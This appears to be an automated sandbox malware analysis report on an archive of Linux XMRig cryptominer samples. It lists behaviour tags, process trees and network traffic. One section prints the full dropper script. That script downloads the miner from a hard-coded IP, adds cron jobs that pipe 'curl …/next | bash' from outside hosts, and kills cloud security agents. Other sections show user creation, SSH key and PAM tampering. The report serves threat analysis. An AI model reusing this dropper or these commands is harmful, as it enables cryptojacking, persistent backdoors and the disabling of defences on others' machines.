Malware Analysis Report

2025-01-02 07:03

Sample ID 241126-pwt9xa1pdt
Target hoze样本.zip
SHA256 747091fd60a9c41ff26d3878bac923c9c14b5472238874754577e14d47b8cba7
Tags
defense_evasion discovery execution persistence privilege_escalatio antivm credential_access privilege_escalation miner xmrig xmrig_linux
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

747091fd60a9c41ff26d3878bac923c9c14b5472238874754577e14d47b8cba7

Threat Level: Known bad

The file hoze样本.zip was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio antivm credential_access privilege_escalation miner xmrig xmrig_linux

Xmrig_linux family

xmrig

Xmrig family

XMRig Miner payload

Modifies password files for system users/ groups

Adds new SSH keys

OS Credential Dumping

Modifies PAM framework files

File and Directory Permissions Modification

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

Deletes log files

Checks hardware identifiers (DMI)

Write file to user bin folder

Creates/modifies Cron job

Attempts to change immutable files

Adds a user to the system

Reads hardware information

Modifies special file permissions

Checks mountinfo of local process

Enumerates running processes

Reads process memory

Reads CPU attributes

Changes its process name

Checks CPU configuration

Enumerates kernel/hardware configuration

Reads runtime system information

System Network Configuration Discovery

Software Deployment Tools

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-26 12:41

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

10s

Max time network

130s

Command Line

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/bash N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /etc/crontab /bin/bash N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pgrep N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/12/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/481/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1508/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/672/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/175/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/963/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1549/status /usr/bin/pgrep N/A
File opened for reading /proc/34/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/14/status /usr/bin/pgrep N/A
File opened for reading /proc/84/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/204/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1135/status /usr/bin/pgrep N/A
File opened for reading /proc/13/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/654/status /usr/bin/pgrep N/A
File opened for reading /proc/1236/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1337/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/22/status /usr/bin/pgrep N/A
File opened for reading /proc/9/status /usr/bin/pgrep N/A
File opened for reading /proc/79/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/418/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1078/status /usr/bin/pgrep N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/658/status /usr/bin/pgrep N/A
File opened for reading /proc/972/status /usr/bin/pgrep N/A
File opened for reading /proc/546/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/555/status /usr/bin/pgrep N/A
File opened for reading /proc/605/status /usr/bin/pgrep N/A
File opened for reading /proc/1017/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1337/status /usr/bin/pgrep N/A
File opened for reading /proc/1355/status /usr/bin/pgrep N/A
File opened for reading /proc/420/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1549/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/15/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1139/status /usr/bin/pgrep N/A
File opened for reading /proc/1148/status /usr/bin/pgrep N/A
File opened for reading /proc/1167/status /usr/bin/pgrep N/A
File opened for reading /proc/10/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1315/status /usr/bin/pgrep N/A
File opened for reading /proc/1508/status /usr/bin/pgrep N/A
File opened for reading /proc/16/status /usr/bin/pgrep N/A
File opened for reading /proc/170/status /usr/bin/pgrep N/A
File opened for reading /proc/1118/status /usr/bin/pgrep N/A
File opened for reading /proc/1103/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1157/status /usr/bin/pgrep N/A
File opened for reading /proc/1090/status /usr/bin/pgrep N/A
File opened for reading /proc/415/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1042/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1313/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/10/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/162/status /usr/bin/pgrep N/A
File opened for reading /proc/420/status /usr/bin/pgrep N/A
File opened for reading /proc/501/status /usr/bin/pgrep N/A
File opened for reading /proc/546/status /usr/bin/pgrep N/A
File opened for reading /proc/167/status /usr/bin/pgrep N/A
File opened for reading /proc/32/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/34/status /usr/bin/pgrep N/A
File opened for reading /proc/1313/status /usr/bin/pgrep N/A
File opened for reading /proc/1504/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/25/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/418/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1199/status /usr/bin/pgrep N/A
File opened for reading /proc/485/cmdline /usr/bin/pgrep N/A
File opened for reading /proc/1305/status /usr/bin/pgrep N/A
File opened for reading /proc/28/cmdline /usr/bin/pgrep N/A

Processes

/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c exec '/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8' "$@" /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/bin/bash

[/tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8 -c #!/bin/bash ifrunning=$(pgrep xrx) ######################## ######################## downloadminer(){ link1="http://185.252.178.82:6972/xrx/xrx" link2="http://185.252.178.82:6972/configs/config-xrx.json" mkdir /var/tmp/.xrx cd /var/tmp/.xrx/ chattr -ia /var/tmp/.xrx/xrx chattr -ia /var/tmp/.xrx/config.json rm -rf /var/tmp/.xrx/xrx rm -rf /var/tmp/.xrx/config.json curl -L -O $link1 || cd1 -L -O $link1 || wget $link1 --no-check-certificate curl -L -O $link2 || cd1 -L -O $link2 || wget $link2 --no-check-certificate mv config-xrx.json config.json chmod +x /var/tmp/.xrx/xrx } ######################## ######################## crontablegend(){ if (( $EUID != 0 )); then if ! crontab -l | grep -q 'secure'; then cd /dev/shm rm -rf /dev/shm/.spark echo "@daily /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "@reboot /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "1 * * * * /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> .spark sleep 1 echo "*/30 * * * * curl 185.252.178.82:1011/next | bash " >> .spark sleep 1 echo "*/30 * * * * curl load.whitesnake.church:1011/next | bash " >> .spark sleep 1 crontab .spark sleep 2 rm -rf /dev/shm/.spark fi fi if (( $EUID == 0 )); then if ! cat /etc/crontab | grep -q 'secure'; then echo "@daily root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "@reboot root /var/tmp/.xrx/init.sh hide >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "1 * * * * root /var/tmp/.x/secure >/dev/null 2>&1 & disown $* " >> /etc/crontab echo "*/30 * * * * root curl 185.252.178.82:1011/next | bash " >> /etc/crontab echo "*/30 * * * * root curl load.whitesnake.church:1011/next | bash " >> /etc/crontab fi fi } ######################## ######################## gettingmineru(){ fsiz=`ls -l /var/tmp/.xrx/xrx | awk '{print $5}'` if [ -f /var/tmp/.xrx/xrx ]; then echo "miner intact" else echo "miner not found,downloading..." downloadminer fi if [[ "$fsiz" -gt 0 ]]; then echo "miner size intact" else echo "filesize 0,downloading..." downloadminer fi } ######################## ######################## gettingmineru crontablegend if test -z "$ifrunning" ; then echo "xrx not running,starting..." /var/tmp/.xrx/xrx </dev/null &>/dev/null & disown -h %1 sleep 1 echo -e "pid:" pgrep xrx fi /tmp/样本/Linux/shc加密脚本/069AD3938C3F9C049F670A8EB49DC1D8]

/usr/bin/pgrep

[pgrep xrx]

/usr/bin/awk

[awk {print $5}]

/bin/ls

[ls -l /var/tmp/.xrx/xrx]

/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/bin/mv

[mv config-xrx.json config.json]

/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/bin/mkdir

[mkdir /var/tmp/.xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/xrx]

/usr/bin/chattr

[chattr -ia /var/tmp/.xrx/config.json]

/bin/rm

[rm -rf /var/tmp/.xrx/xrx]

/bin/rm

[rm -rf /var/tmp/.xrx/config.json]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/xrx/xrx]

/usr/bin/wget

[wget http://185.252.178.82:6972/xrx/xrx --no-check-certificate]

/usr/bin/curl

[curl -L -O http://185.252.178.82:6972/configs/config-xrx.json]

/usr/bin/wget

[wget http://185.252.178.82:6972/configs/config-xrx.json --no-check-certificate]

/bin/mv

[mv config-xrx.json config.json]

/bin/chmod

[chmod +x /var/tmp/.xrx/xrx]

/bin/grep

[grep -q secure]

/bin/cat

[cat /etc/crontab]

/bin/sleep

[sleep 1]

/var/tmp/.xrx/xrx

[/var/tmp/.xrx/xrx]

/usr/bin/pgrep

[pgrep xrx]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
GB 195.181.164.14:443 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-armhf-20240729-en

Max time kernel

2s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/28/stat /usr/bin/killall N/A
File opened for reading /proc/266/stat /usr/bin/killall N/A
File opened for reading /proc/638/cmdline /usr/bin/killall N/A
File opened for reading /proc/134/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/148/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/43/stat /usr/bin/killall N/A
File opened for reading /proc/631/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/218/stat /usr/bin/killall N/A
File opened for reading /proc/108/cmdline /usr/bin/killall N/A
File opened for reading /proc/643/stat /usr/bin/killall N/A
File opened for reading /proc/578/stat /usr/bin/killall N/A
File opened for reading /proc/134/cmdline /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/134/cmdline /usr/bin/killall N/A
File opened for reading /proc/163/stat /usr/bin/killall N/A
File opened for reading /proc/308/stat /usr/bin/killall N/A
File opened for reading /proc/266/stat /usr/bin/killall N/A
File opened for reading /proc/643/cmdline /usr/bin/killall N/A
File opened for reading /proc/27/stat /usr/bin/killall N/A
File opened for reading /proc/583/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/218/stat /usr/bin/killall N/A
File opened for reading /proc/662/stat /usr/bin/killall N/A
File opened for reading /proc/21/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/27/stat /usr/bin/killall N/A
File opened for reading /proc/665/cmdline /usr/bin/killall N/A
File opened for reading /proc/137/stat /usr/bin/killall N/A
File opened for reading /proc/147/stat /usr/bin/killall N/A
File opened for reading /proc/268/stat /usr/bin/killall N/A
File opened for reading /proc/670/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/147/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/26/stat /usr/bin/killall N/A
File opened for reading /proc/97/stat /usr/bin/killall N/A
File opened for reading /proc/582/stat /usr/bin/killall N/A
File opened for reading /proc/29/stat /usr/bin/killall N/A
File opened for reading /proc/665/cmdline /usr/bin/killall N/A
File opened for reading /proc/25/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/134/cmdline /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/308/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/134/cmdline /usr/bin/killall N/A
File opened for reading /proc/216/stat /usr/bin/killall N/A
File opened for reading /proc/266/stat /usr/bin/killall N/A
File opened for reading /proc/637/cmdline /usr/bin/killall N/A
File opened for reading /proc/41/stat /usr/bin/killall N/A
File opened for reading /proc/582/stat /usr/bin/killall N/A
File opened for reading /proc/666/stat /usr/bin/killall N/A
File opened for reading /proc/670/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Signatures

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\1AAF1A9F7877DC2C899D910A52F67F31.tar"

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsbe-20240729-en

Max time kernel

141s

Command Line

[/tmp/xrx/scp]

Signatures

N/A

Processes

/tmp/xrx/scp

[/tmp/xrx/scp]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

debian9-mipsbe-20240418-en

Max time kernel

2s

Command Line

[/tmp/xrx/uninstall.sh]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/330/stat /usr/bin/killall N/A
File opened for reading /proc/737/stat /usr/bin/killall N/A
File opened for reading /proc/2/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/124/cmdline /usr/bin/killall N/A
File opened for reading /proc/740/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/705/stat /usr/bin/killall N/A
File opened for reading /proc/156/stat /usr/bin/killall N/A
File opened for reading /proc/327/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/420/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/filesystems /usr/bin/killall N/A
File opened for reading /proc/4/stat /usr/bin/killall N/A
File opened for reading /proc/156/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/172/stat /usr/bin/killall N/A
File opened for reading /proc/359/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/332/stat /usr/bin/killall N/A
File opened for reading /proc/741/cmdline /usr/bin/killall N/A
File opened for reading /proc/124/cmdline /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/153/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/741/cmdline /usr/bin/killall N/A
File opened for reading /proc/124/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/740/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/23/stat /usr/bin/killall N/A
File opened for reading /proc/667/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/16/stat /usr/bin/killall N/A
File opened for reading /proc/10/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/124/stat /usr/bin/killall N/A
File opened for reading /proc/667/stat /usr/bin/killall N/A
File opened for reading /proc/737/stat /usr/bin/killall N/A
File opened for reading /proc/79/stat /usr/bin/killall N/A
File opened for reading /proc/768/stat /usr/bin/killall N/A
File opened for reading /proc/735/stat /usr/bin/killall N/A
File opened for reading /proc/738/stat /usr/bin/killall N/A
File opened for reading /proc/741/stat /usr/bin/killall N/A
File opened for reading /proc/22/stat /usr/bin/killall N/A
File opened for reading /proc/24/stat /usr/bin/killall N/A
File opened for reading /proc/741/stat /usr/bin/killall N/A
File opened for reading /proc/741/cmdline /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/123/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/79/stat /usr/bin/killall N/A
File opened for reading /proc/385/stat /usr/bin/killall N/A
File opened for reading /proc/701/stat /usr/bin/killall N/A
File opened for reading /proc/705/stat /usr/bin/killall N/A
File opened for reading /proc/730/cmdline /usr/bin/killall N/A
File opened for reading /proc/720/stat /usr/bin/killall N/A
File opened for reading /proc/730/cmdline /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/xrx/uninstall.sh

[/tmp/xrx/uninstall.sh]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/bin/grep

[grep Gentoo]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Signatures

N/A

Processes

/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8

[/tmp/样本/Linux/sh恶意脚本/9C8A5EF51CF8A89F5F00498A5A776DB8]

Network

Country Destination Domain Proto
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.193.91:443 tcp
US 151.101.193.91:443 tcp
N/A 224.0.0.251:5353 udp
GB 89.187.167.3:443 tcp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
US 1.1.1.1:53 1527653184.rsc.cdn77.org udp
GB 89.187.167.38:443 1527653184.rsc.cdn77.org tcp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

132s

Command Line

[/tmp/xrx/chattr]

Signatures

N/A

Processes

/tmp/xrx/chattr

[/tmp/xrx/chattr]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-11-26 12:41

Reported

2024-11-26 12:44

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

149s

Max time network

132s

Command Line

[/tmp/xrx/init0]

Signatures

Adds new SSH keys

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /root/.ssh/authorized_keys /usr/bin/cp N/A

Modifies password files for system users/ groups

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/group /usr/sbin/useradd N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/useradd N/A
File opened for modification /etc/shadow /usr/sbin/useradd N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/gshadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/gshadow /usr/sbin/useradd N/A
File opened for modification /etc/group /usr/sbin/usermod N/A

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A
N/A N/A /usr/bin/chmod N/A

Modifies PAM framework files

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/pam.d/common-auth /bin/bash N/A

OS Credential Dumping

credential_access
Description Indicator Process Target
File opened for reading /etc/shadow /usr/sbin/dpkg-preconfigure N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/chattr N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/useradd N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/bin/sudo N/A
N/A N/A /usr/sbin/usermod N/A

Adds a user to the system

Description Indicator Process Target
N/A N/A /usr/sbin/useradd N/A

Attempts to change immutable files

Description Indicator Process Target
